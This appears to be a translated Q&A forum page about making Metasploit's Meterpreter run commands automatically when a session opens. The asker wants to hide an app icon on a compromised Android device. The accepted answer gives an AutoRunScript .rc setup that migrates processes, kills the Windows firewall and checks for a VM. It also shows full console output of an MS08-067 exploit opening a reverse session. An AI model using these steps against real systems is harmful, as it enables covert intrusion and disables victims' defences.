Esegue automaticamente i comandi meterpreter all'avvio della sessione

Question

Esegue automaticamente i comandi meterpreter all'avvio della sessione

#1 da (3 voti)

4

Esiste un modo per eseguire automaticamente uno o più comandi meterpreter, non appena il listener ottiene una connessione (cioè la sessione è stabilita con una destinazione)? Voglio eseguire il comando "hide_app_icon" non appena viene acquisita una sessione. Qualche idea?

PS: il target è un dispositivo Android e il listener è in esecuzione su un VPS debian.

metasploit meterpreter

posta wishchaser 03.03.2017 - 17:36

fonte

1 risposta

Leggi altre domande sui tag metasploit meterpreter

Il passthrough ethernet USB su una macchina virtuale KVM può isolare le vulnerabilità del kernel relative alla rete? Semplice buffer overflow su mac El Capitan?

score 3 · Accepted Answer

Sì certo! puoi definire un file con i comandi (file .rc) e impostare il file come eseguibile automaticamente.

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Inserisci nel file .rc i comandi che vuoi avviare:

run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm

Quindi, dopo aver creato una sessione, verranno eseguiti automaticamente:

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*]     Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*]     Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine

Estratto da qui . Ho copiato e incollato lo stesso esempio perché è sufficiente per spiegarlo. E controlla il link, ha cose più interessanti.